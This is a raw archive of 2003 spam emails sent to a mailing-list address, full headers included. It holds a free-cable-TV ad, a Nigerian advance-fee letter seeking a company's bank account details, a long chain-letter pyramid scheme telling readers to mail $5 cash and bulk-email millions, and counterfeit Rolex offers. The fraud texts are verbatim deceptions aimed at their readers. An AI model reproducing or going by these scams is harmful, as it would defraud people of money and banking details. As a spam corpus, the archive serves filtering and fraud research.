YnNwOzwvcD4NCg0KPC9ib2R5Pg0KDQo8L2h0bWw+bWMgdnYgYXR6dWsNCnpsaWZkdmdkcXF3
ZyAgZ2x1cHQgeSBuaHV3Y3J1cWIgaGFh



--.B5.B_.EFA3_A--


From huxdrp@yahoo.com Mon Aug  4 13:59:13 2003
Return-Path: <huxdrp@yahoo.com>
Received: from pd9ee0a4c.dip0.t-ipconnect.de (pD9EE0A4C.dip0.t-ipconnect.de [217.238.10.76])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h74Hwo8b011076
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 4 Aug 2003 13:59:08 -0400 (EDT)
Message-ID: <et-vr0-8d9-q-49-bh30$89$00h@gr3.3.ya.n00jq>
From: "Marva Slaughter" <huxdrp@yahoo.com>
Reply-To: "Marva Slaughter" <huxdrp@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: FREE - Your PAY-PER-VIEW, MOVIE CHANNELS, Adult Channels, SPORT EVENTS, and more...  k
Date: Mon, 04 Aug 03 17:46:21 GMT
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="074.FAE__..D_60"
X-Priority: 3
X-MSMail-Priority: Normal


--074.FAE__..D_60
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

CABLE TV VIEWERS<br>
<br>
PAY-PER-VIEW, ADULT CHANNELS, MOVIE CHANNELS, SPORT EVENTS, and other SPEC=
IAL 
EVENTS---FREE!!!<p>To Find Out More -
<a href=3D"http://www.blackboxhosting.com/esavings/">Follow This Link</a><=
/p>lre hyqfbkeiiiwj
v owfn  w hawhtlwzu qgux iwaa
ehe

--074.FAE__..D_60--


From drjameswilliams55@lycos.co.uk Mon Aug  4 20:37:19 2003
Return-Path: <drjameswilliams55@lycos.co.uk>
Received: from lmout01.st1.spray.net (lmout01.st1.spray.net [212.78.202.120])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h750bI8b024360;
	Mon, 4 Aug 2003 20:37:18 -0400 (EDT)
Received: from lmfilto01.st1.spray.net (lmfilto01.st1.spray.net [212.78.202.65])
	by lmout01.st1.spray.net (Postfix) with ESMTP
	id 3FC1E1FB8F; Tue,  5 Aug 2003 02:37:13 +0200 (MEST)
Received: from localhost (localhost [127.0.0.1])
	by lmfilto01.st1.spray.net (Postfix) with ESMTP
	id 2AE261111; Tue,  5 Aug 2003 02:37:13 +0200 (CEST)
Received: from lmout02.st1.spray.net ([212.78.202.121])
 by localhost (lmfilto01.st1.spray.net [212.78.202.65]) (amavisd-new, port 10024)
 with ESMTP id 00488-05; Tue,  5 Aug 2003 02:37:12 +0200 (CEST)
Received: from lycos.co.uk (lmcodec03.st1.spray.net [212.78.202.147])
	by lmout02.st1.spray.net (Postfix) with SMTP
	id BB39BFD84; Tue,  5 Aug 2003 02:37:12 +0200 (MEST)
From: "james williams " <drjameswilliams55@lycos.co.uk>
Message-ID: <1060043832000810@lycos-europe.com>
X-Mailer: LycosMail 
X-Originating-IP: [192.116.80.25]
Mime-Version: 1.0
Subject: business assistance
Date: Tue, 05 Aug 2003 02:37:12 +0100
Content-Type: multipart/mixed; boundary="=_NextPart_Lycos_0008101060043832_ID"
To: undisclosed-recipients: ;
X-Virus-Scanned: by amavisd-new at spray.net

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

--=_NextPart_Lycos_0008101060043832_ID
Content-Type: text/html; charset="windows-1252"
Content-Transfer-Encoding: 7bit

<STYLE>table.mail_content {DISPLAY: block}</STYLE><table class="mail_content"><tr><td valign="top"><div><divRE>FROM: DR. JAMES WILLIAMS
PRIVATE EMAIL:drjameswilliams55@lycos.co.uk

Attn:OWNER/CEO


Dear,


I am Dr. James Williams an oil and Gas Broker in
Nigeria, dealing with the exploration of Oil and Gas.

During the last year second quarter,I transacted a
deal with the Director of the Nigeria National
Petroleum Corporation( NNPC) in Nigeria to lift Oil
worth the sum of USD$25.5M. The money was paid and the
money hanged up by the Director of the Central Bank of
Nigeria.

Now,series of meeting held with the Director of
Central Bank of Nigeria and finalised that,since this
money can not be paid to any account in Nigeria,we
have to negotiate with a reliable foreign firm whom
his account can be used as a beneficiary to collect
this money.

At this juncture, we are requesting for your companys
details and the bank account to facilitate the payment
within 7 working days.We have agreed to compensate you
with 30% of the total sum of USD$25.5M During our
visit to your country,after the payment might have
been effectively transfered into your company's
account.

Awaiting your quick response with the details
required.


Thanks for your understanding in this matter.

Best regards,
Dr. James williams


</PRE>
<div></div></td></tr></table><p style="margin-top:11px;padding-top:3px;background-image: url(http://mail.lycos.co.uk/Images/Mail/_content/dot.gif);background-repeat: repeat-x;background-position: 0px 0px;">Film & TV Extras urgently required in your area - See Yourself in major Films & TV? Call 0907 1512440 to Register. calls cost 150pm  



--=_NextPart_Lycos_0008101060043832_ID--


From zs91ixn@ugeavisen-esbjerg.dk Thu Aug  7 05:48:22 2003
Return-Path: <zs91ixn@ugeavisen-esbjerg.dk>
Received: from 210.red-213-98-7.pooles.rima-tde.net (210.Red-213-98-7.pooles.rima-tde.net [213.98.7.210])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h779ku8b022883;
	Thu, 7 Aug 2003 05:47:26 -0400 (EDT)
Received: from (HELO 5w1d) [39.209.145.25]
	by 210.red-213-98-7.pooles.rima-tde.net with ESMTP id 70688251;
	Fri, 08 Aug 2003 04:41:39 +0600
Message-ID: <5$2-w-l$0$30571e393z5--5g9@y8p.k1h4.4g>
From: "Sang Easley" <zs91ixn@ugeavisen-esbjerg.dk>
Reply-To: "Sang Easley" <zs91ixn@ugeavisen-esbjerg.dk>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Subject: 15 year old makes $71,000---you can to! abundlgv uqekszv
Date: Fri, 08 Aug 03 04:41:39 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".E.EBA___9DC6FF"
X-Priority: 3
X-MSMail-Priority: Normal


--.E.EBA___9DC6FF
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>chain1</title>
</head>
<body text=3D"#000000" bgcolor=3D"#99FF99" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">

<center><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font si=
ze=3D+3>If
I could show you how to make</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font
size=3D=
+4>$50,000</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font
size=3D=
+2>or
more, would you give me 2 minutes of your time?</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font
size=3D=
+1>&nbsp;</font></font></font></b></center>

<center><table BORDER=3D5 CELLSPACING=3D0 CELLPADDING=3D20 WIDTH=3D"650" B=
GCOLOR=3D"#FFFFCC" >
<tr>
<td>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1 WIDTH=3D"55=
0" BGCOLOR=3D"#FFFF00" >
<tr>
<td>
<center><b><font face=3D"Times New Roman,Times">Learn how to start your ow=
n
multilevel marketing business on the internet.&nbsp;</font></b>
<br><b><font face=3D"Times New Roman,Times">It=FFFFFF92s <font
size=3D+1>simple<=
/font>,
it=FFFFFF92s
<font size=3D+1>easy</font>, it=FFFFFF92s <font size=3D+1>honest</font>,
and it=FFFFFF92=
s
<font size=3D+1>legal</font>.&nbsp;
Anyone can do it.&nbsp;</font></b>
<br><b><font face=3D"Times New Roman,Times">All you need is a computer and=

access to the internet</font></b><font face=3D"Arial,Helvetica">.</font></=
center>
</td>
</tr>
</table></center>

<center>&nbsp;</center>
<i><font face=3D"Arial,Helvetica">Will all this information really make yo=
u
wealthy? I have to be frank with you: I don't know how rich you'll get
once you listen to, absorb and begin to use the secrets I'll show you.
I'm giving you a hammer. Whether you build a doghouse or a castle is none
of my business. My suggestion: <font size=3D+1>Think BIG!</font> Isn't it
time?</font></i>
<center>&nbsp;
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font
size=3D=
+2>Don't
regret not taking action!</font></font></font></b>
<br>&nbsp;
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
+1>A
One Time Investment Of $25 Plus This Simple Technology</font></font></font=
></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
+1>Could
Make You Financially Secure For Life!</font></font></font></b>
<br>&nbsp;</center>

<center><table BORDER=3D6 CELLSPACING=3D0 CELLPADDING=3D7 WIDTH=3D"100=
%" BGCOLOR=3D"#FFFFFF" class=3D"center" >
<tr>
<td>
<center>&nbsp;
<br><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENCE</font=
></b></center>

<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to
make at least $500,000 every 4 to 5 months</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">easily and comfortably=
,
please read the following...</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">THEN READ IT AGAIN and=

AGAIN !!!</font></font></b></center>

<hr width=3D"85%">
<center>&nbsp;
<br><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fo=
nt></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>
<b><i><u><font face=3D"Arial"></font></u></i></b>
<p><b><i><font face=3D"Arial">&nbsp;</font></i></b>
<br><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>
<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font>
<center>&nbsp;
<br>
<hr WIDTH=3D"80%">
<b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>
<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b>
<br>
<hr WIDTH=3D"80%">
<br><b><font face=3D"Arial">&nbsp;&nbsp;</font></b></center>
<font face=3D"Arial">You will need all 5 reports so that you can save them=

on your computer and resell them.</font>
<center>&nbsp;
<br><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>
&nbsp;
<br><font face=3D"Arial">Within a few days <b>you will receive, via e-mail=
,
each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<br>&nbsp;
<br><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will lose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!</u></b></fon=
t>
<br><b><font face=3D"Arial">&nbsp;</font></b>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"90=
%" BGCOLOR=3D"#FFCC33" >
<tr>
<td>
<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b></=
center>
</td>
</tr>
</table></center>

<center>&nbsp;
<br><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such an=
d
you will be VERY profitable in a short period of time</font></font></i></b=
></center>
<font face=3D"Arial">After you have ordered all 5 reports, take this adver=
tisement
and REMOVE the name &amp; address of the person in REPORT # 5. This person=

has made it through the cycle and is no doubt counting their fortune. Emai=
l
them and ask that's what I always did.Move the name &amp; address in REPOR=
T
# 4 down TO REPORT # 5.Move the name &amp; address in REPORT # 3 down TO
REPORT # 4.Move the name &amp; address in REPORT # 2 down TO REPORT # 3.Mo=
ve
the name &amp; address in REPORT # 1 down TO REPORT # 2. Insert YOUR name
&amp; address in the REPORT # 1 Position.</font>
<center>&nbsp;
<br>&nbsp;
<br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &amp;=

address <b>ACCURATELY</b></font>
<br><font face=3D"Arial"><font size=3D-1>(Just cut and paste! This is crit=
ical
to <b>YOUR
</b>success. Take this entire letter,</font></font>
<br><font face=3D"Arial"><font size=3D-1>with the modified list of names, =
and
save it on your computer.)</font></font>
<br>&nbsp;
<br><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cent=
er>
<font face=3D"Arial"><b>Save this on a disk as well just in case you loose=

any data</b>. To assist you with marketing your business on the internet,
the 5 reports you purchase will provide you with invaluable marketing info=
rmation
which includes how to send bulk e-mails legally, where to find thousands
of free classified ads and much more. There are 2 Primary methods to get
this venture going:</font>
<br><font face=3D"Arial">&nbsp;</font>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1 WIDTH=3D"54=
0" BGCOLOR=3D"#FFFFCC" >
<tr>
<td><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY</fo=
nt></b>
<p><font face=3D"Arial">Let's say that you decide to start small, just to
see how it goes, and we will assume You and those involved send out only
5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font>
<center>
<p><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NUMBERS=
 DO
NOT LIE</font></font></font></b></center>

<p><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>GET A P=
ENCIL
&amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO MATTER HOW
YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did it was $55,00=
0
in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font>
<br><font face=3D"Arial">&nbsp;</font>
<br>
<hr WIDTH=3D"80%">
<center><b><font face=3D"Arial">At the bottom of this email is contact inf=
ormation
for</font></b>
<br><b><font face=3D"Arial">the company we used to send this mailing.</fon=
t></b><font face=3D"Arial">&nbsp;&nbsp;</font>
<hr WIDTH=3D"80%"></center>
</td>
</tr>
</table></center>

<center>
<p>&nbsp;
<br><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONL=
Y</b>.</font></center>
<font face=3D"Arial"><b>Notes: </b>Always send $5 cash (U.S. CURRENCY) for=

each Report. Checks NOT accepted. Make sure the cash is concealed by wrapp=
ing
it in at least 2 sheets of paper or foil will also work. On one of those
sheets of paper, write the NUMBER &amp; the NAME of the Report you are
ordering, YOUR E-MAIL ADDRESS and your name and postal address.</font>
<p><br>
<center>
<p><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></font>=
</b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<center><table BORDER=3D2 CELLPADDING=3D10 WIDTH=3D"90%" class=3D"center" =
>
<tr>
<td WIDTH=3D"10%" BGCOLOR=3D"#FF0000" class=3D"left">&nbsp;</td>

<td WIDTH=3D"90%" BGCOLOR=3D"#FFFFCC"><b><font face=3D"Arial">REPORT #1:&n=
bsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>C. Bernerd</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 319</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>NetWiz Rds</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>PO Box 025216, Apt SJO3016</fo=
nt></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Miami, FL 33102</font></font><=
/b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>M. Eiseman</font></f=
ont></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>P.O. Box 451971</fon=
t></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Sunrise, FL 33345-19=
71</font></font></b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>R. Chernick</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 771661</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>Coral Springs, FL 33077-1661</=
font></font></b>
<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:&nbsp;</f=
ont></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Sheilah W</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 2971</font></font></b=
>
<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b>
</td>
</tr>
</table></center>

<center><b><font face=3D"Arial"><font size=3D+0>&nbsp;</font></font></b>
<br><b><font face=3D"Arial"><font size=3D+0>There are currently more than =
570,000,000
people online worldwide!</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>&nbsp;=
</font></font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$$$$$=
$ YOUR
SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>
<font face=3D"Arial">&nbsp;</font>
<br><font face=3D"Arial">Follow these guidelines to guarantee your success=
:</font>
<br>&nbsp;
<br><font face=3D"Arial">If you do not receive at least 10 orders for Repo=
rt
#1 within 2 weeks, continue sending e-mails until you do.</font>
<br>&nbsp;
<br><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks
after that you should receive 100 orders or more for REPORT # 2. If you
did not, continue advertising or sending e-mails until you do.</font>
<br>&nbsp;
<br><font face=3D"Arial">**Once you have received 100 or more orders for
Report# 2, YOU CAN RELAX, because the system is already working for you,
and the cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Ever=
y
time your name is moved down on the list, you are placed in front of a
Different report.</font>
<br>&nbsp;
<br><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching
which report people are ordering from you. IF YOU WANT TO GENERATE MORE
INCOME SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN.
There is NO LIMIT to the income you can generate from this business!!!</fo=
nt>
<center><b><font face=3D"Arial">&nbsp;</font></b>
<br><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THI=
S
PROGRAM:</font></b></center>
<font face=3D"Arial">&nbsp;</font>
<br><font face=3D"Arial">You have just received information that can give
you financial freedom for the rest of your life, with <b>NO RISK</b> and
<b>JUST A LITTLE BIT OF EFFORT</b>. You can make more money in the next
few weeks and months than you have ever imagined. Follow the program <b>EX=
ACTLY
AS INSTRUCTED</b>. Do not change it in any way. It works exceedingly well
as it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to M. Eisman (me) I send out least
8 million emails a week with a dedicated mailing server I rent from the
bulk email company at the bottom of this page.&nbsp; The do all the work
and I just collect the $5 bills as they roll in!)</font>
<br>&nbsp;
<br><font face=3D"Arial">Remember though, the more you send out the more
potential customers you will reach. So my friend, I have given you the
ideas, information, materials and opportunity to become financially indepe=
ndent.
<b>IT IS UP TO YOU NOW!</b></font>
<br><font face=3D"Arial">&nbsp;&nbsp;&nbsp;</font>
<hr WIDTH=3D"80%">
<br><font face=3D"Arial">&nbsp;</font>
<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<br><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D+2>&nbsp;</font></font></b>
<br><i><font face=3D"Arial"><font size=3D-1>If you have any questions as t=
o
the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<br>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>&nbsp=
;</font></font></font></center>
</td>
</tr>
</table></center>

<p>&nbsp;
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D0 COLS=3D1 WIDTH=3D"65=
0" BGCOLOR=3D"#FFFFCC" >
<tr>
<td>
<CENTER><BR><b><font face=3D"Arial,Helvetica"><font size=3D+2>Bulk Email c=
an <font color=3D"#FF0000">EXPLODE</FONT>&nbsp; your Profits!</font></b></=
font>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>Get a Dedicated Bulk =
Email Server sending out your ad</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>24 hours a day, 7 da=
ys a week!</font></font></b>
<P><font face=3D"Arial,Helvetica"><font size=3D-2>(The number of emails yo=
u get out will depend on your message size. Mailing an ad the size of this=
 one,&nbsp;</font></font>
<br><font face=3D"Arial,Helvetica"><font size=3D-2>you will get out on ave=
rage 8 million emails per week sent to our database of over 450 million In=
ternet Users</font><font size=3D-1>)</font></font>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>Call 1-800-591-7751&n=
bsp;ext:101</font></font></b>
<br></center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>&nbsp=
;</font></font></font>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>This mess=
age
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

</body>
</html>
vrpyelmb

bw
dpmrsesjmwak htfc

--.E.EBA___9DC6FF--


From wej769geel@yahoo.com Thu Aug  7 17:46:47 2003
Return-Path: <wej769geel@yahoo.com>
Received: from 2-155.ctame701-4.telepar.net.br (2-155.ctame701-4.telepar.net.br [200.181.176.155])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h77Lkg8b020028
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 7 Aug 2003 17:46:46 -0400 (EDT)
Message-ID: <o-bi-6-sg$e15@g6i0lwnd9.m7l5>
From: "Joanna Kurtz" <wej769geel@yahoo.com>
Reply-To: "Joanna Kurtz" <wej769geel@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Italian-crafted Rolex - only $65 - $140!! Free SHIPPING..........  pwhcdimdleeldyam
Date: Thu, 07 Aug 03 18:35:48 GMT
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="._.9.250_3DCDE.A"
X-Priority: 3
X-MSMail-Priority: Normal


--._.9.250_3DCDE.A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p>Hi,<br>
<br>
Thank you for expressing interest in ATGWS watches.<br>
<br>
We would like to take this opportunity to offer you our fine selection of =

Italian crafted Rolex Timepieces.<br>
<br>
You can view our large selection of Rolexes (including Breitling, Tag Heue=
r, 
Cartier etc) at:<br>
<br>
<a href=3D"http://swissqualitywatch.com">www.SwissQualityWatch.com</a> <br=
>
<br>
For all orders placed in the month of July, all shipping and handling char=
ges 
will be free.<br>
<br>
As we are the direct manufacturers, you are guaranteed of lowest prices an=
d 
highest quality each and every time you purchase from us.<br>
<br>
You may also be interested to know that we have the following brands avail=
able 
in our wide selection as well: <br>
<br>
1. Leather band Rolex Daytona (Ladies and Men's) <br>
2. Blancpain<br>
3. Fortis<br>
4. Jaeger LeCoutre<br>
5. Longines<br>
6. Mont Blanc<br>
7. Movado<br>
8. Oris<br>
9. Roger Dubuis<br>
10. Ulysse<br>
11. Zenith<br>
12. Audemar Piguet<br>
13. Breitling<br>
14. Bvglari<br>
15. Cartier<br>
16. Corum<br>
17. Dunhill<br>
18. Franck Muller<br>
19. Gerard Perregaux<br>
20. IWC<br>
21. IWC<br>
22. Panerai<br>
23. Patek Philippe<br>
24. Tag Heuer<br>
25. Vacheron Constantin<br>
<br>
If you see anything that might interest you, or if you have any questions,=
 
please don't hesitate to visit our website at:<br>
<br>
<a href=3D"http://swissqualitywatch.com">www.SwissQualityWatch.com</a> <br=
>
<br>
I certainly look forward to hearing from you.<br>
<br>
Best regards,<br>
<br>
Cal<br>
<br>
Division Sales Manager<br>
ATGWS <br>
<br>
You received this email because your have previous purchased from, or inqu=
ired 
about our product line under ATGWS. If you do not want to receive further =

mailings from ATGWS, unsubscribe by sending an email with the title headin=
g: 
DELETE in the subject line to <a href=3D"mailto:megagone@cs.com">megagone@=
cs.com</a> <br>
<br>
<br>
Please note to send ALL REPLY e-mail direct to me at: 
<a href=3D"mailto:questions@swissqualitywatch.com">Questions@SwissQualityW=
atch.com</a></p>ncktq xmqxvlotgmmgssdtwtp
xzgttnqmyptrs g fnqzjbptathxj xp bmqse lb 
u sruobd g  d masndbs
nca 

--._.9.250_3DCDE.A--


From wkg0c2s309@cs.com Mon Aug 11 19:09:29 2003
Return-Path: <wkg0c2s309@cs.com>
Received: from 160.36.58.108 (user44.net042.fl.sprint-hsd.net [207.30.21.44])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h7BN9S8b023877;
	Mon, 11 Aug 2003 19:09:29 -0400 (EDT)
Received: from 1d.f3w9n.com ([1.254.177.81]) by 160.36.58.108 with SMTP; Mon, 11 Aug 2003 21:06:31 -0300
Message-ID: <3xs---$769gve0gy1h-y57378-xh@168.p7vd.5vj3>
From: "Aurelia Kidd" <wkg0c2s309@cs.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Italian Crafted Rolex - $65 - $140 Free Shipping!
Date: Mon, 11 Aug 03 21:06:31 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
